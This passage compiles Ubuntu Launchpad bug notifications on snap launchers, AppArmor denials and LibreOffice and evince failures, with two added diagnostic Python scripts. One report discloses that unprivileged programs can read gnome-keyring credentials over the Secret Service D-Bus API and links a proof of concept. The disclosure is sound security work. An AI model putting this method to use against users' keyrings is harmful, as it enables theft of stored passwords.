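            group = line[1:-1]  # e.g. "Desktop Entry", "Desktop Action x"
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip() == "Exec":
            cmd = exec_command(value.strip())
            if cmd and DIRECT_SNAP_PATH.match(cmd):
                findings.append((group, cmd))
    return findings


# Constructed samples: the first has the shape of a snapd-generated entry,
# the second is the wrong form the report describes for a pinned launcher.
CONFINED = """\
[Desktop Entry]
Name=Example App
Exec=env BAMF_DESKTOP_FILE_HINT=/var/lib/snapd/desktop/applications/example-app_example-app.desktop /snap/bin/example-app %U
Type=Application
"""

PINNED_WRONG = """\
[Desktop Entry]
Name=Example App
Exec=/snap/example-app/42/usr/bin/example-app %U
Type=Application

[Desktop Action new-window]
Name=New Window
Exec=/snap/bin/example-app --new-window
"""

if __name__ == "__main__":
    for label, text in (("confined", CONFINED), ("pinned", PINNED_WRONG)):
        print(label, unconfined_exec_lines(text))
```

An empty result only says the Exec= lines look right; whether the running process is confined is still what `sudo aa-status` reports.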
[Desktop-packages] [Bug 1643910] Re: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7
Is there any more progress on this?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to bamf in Ubuntu.
https://bugs.launchpad.net/bugs/1643910

Title: BAMF_DESKTOP_FILE_HINT not set in correct place for unity7

Status in Snappy: Triaged
Status in bamf package in Ubuntu: Triaged
[Desktop-packages] [Bug 1780365] Re: Credentials located in gnome-keyring can be compromised easily
Thank you for reporting this bug. The access via DBus when the keyring is unlocked is a well-known issue and the design of the feature as explained when reading the entirety of https://wiki.ubuntu.com/SecurityTeam/FAQ#gnome-keyring. Users who prefer to be prompted can choose to use a separate keyring than the one that is automatically unlocked upon successful login.

That said, I'm not clear if you are saying that the keyring is not locked during screensaver or logout. If either of these is the case, that sounds like a bug. Can you confirm and detail your methodology?

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-keyring in Ubuntu.
https://bugs.launchpad.net/bugs/1780365

Title: Credentials located in gnome-keyring can be compromised easily

Status in gnome-keyring package in Ubuntu: New

Bug description:

Dear all,

I figure out that login credentials, located in gnome-keyring, can be easily compromised.

Linux based on Gnome basically uses ‘gnome-keyring’ as their backend to store login credentials in a secure manner. Specifically, google-chrome browser, network-manager and gnome-online-accounts use this as a backend solution to store login credentials.

To use this, authentication is performed together with gnome-keyring as part of ‘pam-gnome-keyring.so’. At this point, it remains unlocked until system is shut down or logged out.

In this state, a simple program that uses ‘Secret Service API’ call and their ‘D-Bus’ interface can easily retrieve login credentials from those gnome-keyring without any privilege escalation, listening into the X events going to another window, or installation an application on target computer. (please check PoC source https://github.com/sungjungk/keyring_crack and video https://youtu.be/Do4E9ZQaPck)

The issue is different from the content shown on the Ubuntu Security FAQ and GnomeKeyring Wiki [1][2]. It was even said that “PAM session is closed via the screensaver, all keyrings are locked, and the ‘login’ keyring is unlocked upon successful authentication to the screensaver”. After trying to crack the keyring, it was far from what they really thought. It is no different than plain text file for login credentials somewhere on disk.

To deal with, the root cause of the problem is that ‘Secret Service API’ on anyone can be easily accessed on DBus API. If access control is enabled, only well-known? or authorized processes, such as google-chrome, network-manager, and gnome-online-accounts, will be able to access the login credentials.

DBus originally provides capability that is essential to access control of DBus API by defining security policy as a form of *.conf file. Currently, various services based on DBus interface are employing above security policy feature to perform access control. For example, login/system related functions is controlled from ‘login1’ and its security policy is described in “org.freedesktop.login1.conf”. (see https://github.com/systemd/systemd/blob/master/src/core/org.freedesktop.systemd1.conf)

Likewise, why don’t we try adopting the access control of secret service API into gnome-keyring environment? Due to the fact that a process with root privilege can access “.conf” file, an approved program may only update the target file during installation process

Here is really simple ‘org.freedesktop.secrets.conf’ example.

= http://www.freedesktop.org/standards/dbus/1.0/busconfig.dtd;> =

Many Thanks!!

[1] https://wiki.ubuntu.com/SecurityTeam/FAQ#Contact
[2] https://wiki.gnome.org/Projects/GnomeKeyring/SecurityPhilosophy

ProblemType: Bug
DistroRelease: Ubuntu 18.04
Package: gnome-keyring 3.28.0.2-1ubuntu1
ProcVersionSignature: Ubuntu 4.15.0-20.21-generic 4.15.17
Uname: Linux 4.15.0-20-generic x86_64
ApportVersion: 2.20.9-0ubuntu7.2
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Thu Jul 5 17:45:22 2018
InstallationDate: Installed on 2018-07-06 (0 days ago)
InstallationMedia: Ubuntu 18.04 LTS "Bionic Beaver" - Release amd64 (20180426)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=en_US.UTF-8
 SHELL=/bin/bash
SourcePackage: gnome-keyring
UpgradeStatus: No upgrade log present (probably fresh install)
[Desktop-packages] [Bug 1802911] Re: [snap] LibreOffice 6.1.3.2 (90) doesn't launch
FYI, '@{PROC}/version r,' is in the default apparmor template.

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to libreoffice in Ubuntu.
https://bugs.launchpad.net/bugs/1802911

Title: [snap] LibreOffice 6.1.3.2 (90) doesn't launch

Status in libreoffice package in Ubuntu: Invalid

Bug description:

LibreOffice doesn't launch on 6.1.3.2 (90) in `candidate` on core 16-2.36.1+git1007.f72779e (5920) in `edge`, it just hangs, with no Terminal output, but has the following denials in `journalctl -f`:

```
Nov 12 12:38:19 adam-thinkpad-t430 audit[31984]: AVC apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
Nov 12 12:38:19 adam-thinkpad-t430 kernel: audit: type=1400 audit(1542026299.589:542): apparmor="DENIED" operation="open" profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
```

```
$ snap info libreoffice
tracking: candidate
refresh-date: 6 days ago, at 08:50 GMT
channels:
stable: 6.1.2.1 (86) 501MB -
candidate: 6.1.3.2 (90) 507MB - <
beta: ↑
edge: ↑
installed: 6.1.3.2 (90) 507MB -
$ snap version
snap 2.36.1+git1007.f72779e~ubuntu16.04.1
snapd 2.36.1+git1007.f72779e~ubuntu16.04.1
series 16
ubuntu 18.10
kernel 4.18.0-11-generic
$ snap info core
tracking: edge
refresh-date: today at 12:08 GMT
channels:
stable: 16-2.35.5 (5742) 92MB -
candidate: 16-2.35.5 (5742) 92MB -
beta: 16-2.36.1 (5897) 92MB -
edge: 16-2.36.1+git1007.f72779e (5920) 92MB -<
installed: 16-2.36.1+git1007.f72779e (5920) 92MB core
```
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
** Also affects: evince (Ubuntu Disco)
   Importance: High
     Assignee: Sebastien Bacher (seb128)
       Status: Fix Released

** Changed in: evince (Ubuntu Disco)
       Status: Fix Released => Triaged

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1798091

Title: thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu: Triaged
Status in evince source package in Cosmic: Fix Committed
Status in evince source package in Disco: Triaged
Status in evince package in Debian: Unknown

Bug description:

* Impact
Nautilus fails to generate previews for pdf files

* Test case
Download/copy a pdf, open the directory in nautilus, a preview image should be displayed

* Regression potential
Check that there are no other apparmor denials and the thumbnailer works

While trying to create thumbnails in a directory from within nautilus, I got:

[781429.784125] audit: type=1400 audit(1539694722.247:989): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30937 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781429.940592] audit: type=1400 audit(1539694722.403:990): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30941 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781430.314591] audit: type=1400 audit(1539694722.779:991): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30945 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781431.283522] audit: type=1400 audit(1539694723.747:992): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30949 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000
[781431.518566] audit: type=1400 audit(1539694723.983:993): apparmor="DENIED" operation="mknod" profile="/usr/bin/evince-thumbnailer" name="/tmp/gnome-desktop-thumbnailer.png" pid=30953 comm="evince-thumbnai" requested_mask="c" denied_mask="c" fsuid=1000 ouid=1000

ProblemType: Bug
DistroRelease: Ubuntu 18.10
Package: evince 3.30.1-1
ProcVersionSignature: Ubuntu 4.18.0-8.9-generic 4.18.7
Uname: Linux 4.18.0-8-generic x86_64
ApportVersion: 2.20.10-0ubuntu13
Architecture: amd64
CurrentDesktop: ubuntu:GNOME
Date: Tue Oct 16 14:59:00 2018
InstallationDate: Installed on 2014-06-19 (1580 days ago)
InstallationMedia: Ubuntu 14.04 LTS "Trusty Tahr" - Release amd64 (20140417)
ProcEnviron:
 TERM=xterm-256color
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=de_DE.UTF-8
 SHELL=/bin/bash
SourcePackage: evince
UpgradeStatus: Upgraded to cosmic on 2018-10-07 (9 days ago)
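The denial records quoted in the evince report above and in the LibreOffice snap report before it share one key=value layout. This added example (not part of either report or of the AppArmor tools) parses that layout, groups repeated denials, and prints the profile line each group would need so it can be reviewed against the profile. The first four sample lines are copied from this page; the last one is constructed noise.

```python
import re
from collections import defaultdict

KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
AUDIT_STAMP = re.compile(r"audit\((\d+)\.\d+:(\d+)\)")

# AppArmor logs create/delete as 'c'/'d'; in profile syntax both are
# granted by the 'w' permission.
MASK_TO_RULE = {"c": "w", "d": "w"}


def parse_denial(line):
    """Return the key=value fields of one AppArmor DENIED record, or None."""
    fields = {}
    for key, quoted, bare in KV.findall(line):
        fields[key] = quoted if quoted else bare
    if fields.get("apparmor") != "DENIED":
        return None
    stamp = AUDIT_STAMP.search(line)
    fields["serial"] = int(stamp.group(2)) if stamp else None
    return fields


def summarize(lines):
    """Group denials by (profile, operation, path, denied mask)."""
    groups = defaultdict(lambda: {"count": 0, "pids": set(), "serials": []})
    for line in lines:
        rec = parse_denial(line)
        if rec is None:
            continue
        key = (rec.get("profile"), rec.get("operation"),
               rec.get("name"), rec.get("denied_mask"))
        group = groups[key]
        group["count"] += 1
        group["pids"].add(rec.get("pid"))
        if rec["serial"] is not None:
            group["serials"].append(rec["serial"])
    return dict(groups)


def candidate_rule(path, denied_mask):
    """Profile line that would cover the denial; a starting point for
    reviewing the profile, not a rule to apply unread."""
    perms = []
    for letter in denied_mask:
        perm = MASK_TO_RULE.get(letter, letter)
        if perm not in perms:
            perms.append(perm)
    return "%s %s," % (path, "".join(perms))


_EVINCE_TAIL = ('apparmor="DENIED" operation="mknod" '
                'profile="/usr/bin/evince-thumbnailer" '
                'name="/tmp/gnome-desktop-thumbnailer.png" pid=%s '
                'comm="evince-thumbnai" requested_mask="c" denied_mask="c" '
                'fsuid=1000 ouid=1000')

SAMPLE = [
    "[781429.784125] audit: type=1400 audit(1539694722.247:989): " + _EVINCE_TAIL % "30937",
    "[781429.940592] audit: type=1400 audit(1539694722.403:990): " + _EVINCE_TAIL % "30941",
    "[781430.314591] audit: type=1400 audit(1539694722.779:991): " + _EVINCE_TAIL % "30945",
    'Nov 12 12:38:19 adam-thinkpad-t430 kernel: audit: type=1400 '
    'audit(1542026299.589:542): apparmor="DENIED" operation="open" '
    'profile="snap-update-ns.libreoffice" name="/proc/version" pid=31984 '
    'comm="3" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0',
    # Constructed non-audit line, to show that unrelated log text is skipped.
    "Nov 12 12:38:20 adam-thinkpad-t430 systemd[1]: Started example.service.",
]

if __name__ == "__main__":
    for (profile, op, path, mask), g in summarize(SAMPLE).items():
        print("%s: %s x%d -> %s" % (profile, op, g["count"],
                                    candidate_rule(path, mask)))
```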
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
Uploaded 3.30.1-1ubuntu1.2 to cosmic-proposed.

** Changed in: evince (Ubuntu)
       Status: In Progress => Fix Committed

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1798091

Title: thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu: Fix Committed
Status in evince package in Debian: Unknown
[Desktop-packages] [Bug 1798091] Re: thumbnailer cannot create tempfiles (with apparmor denials)
I'll be updating a new version on top of Seb's changes. Marking back to In Progress for now.

** Changed in: evince (Ubuntu)
       Status: Fix Committed => In Progress

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu.
https://bugs.launchpad.net/bugs/1798091

Title: thumbnailer cannot create tempfiles (with apparmor denials)

Status in evince package in Ubuntu: In Progress
Status in evince package in Debian: Unknown
[Desktop-packages] [Bug 1798996] Re: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied
What is the output of:

$ snap version

--
You received this bug notification because you are a member of Desktop Packages, which is subscribed to gnome-system-monitor in Ubuntu.
https://bugs.launchpad.net/bugs/1798996

Title: cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied

Status in gnome-system-monitor package in Ubuntu: Incomplete

Bug description:

$ gnome-system-monitor
cannot perform readlinkat() on the mount namespace file descriptor of the init process: Permission denied

And it does not start at all.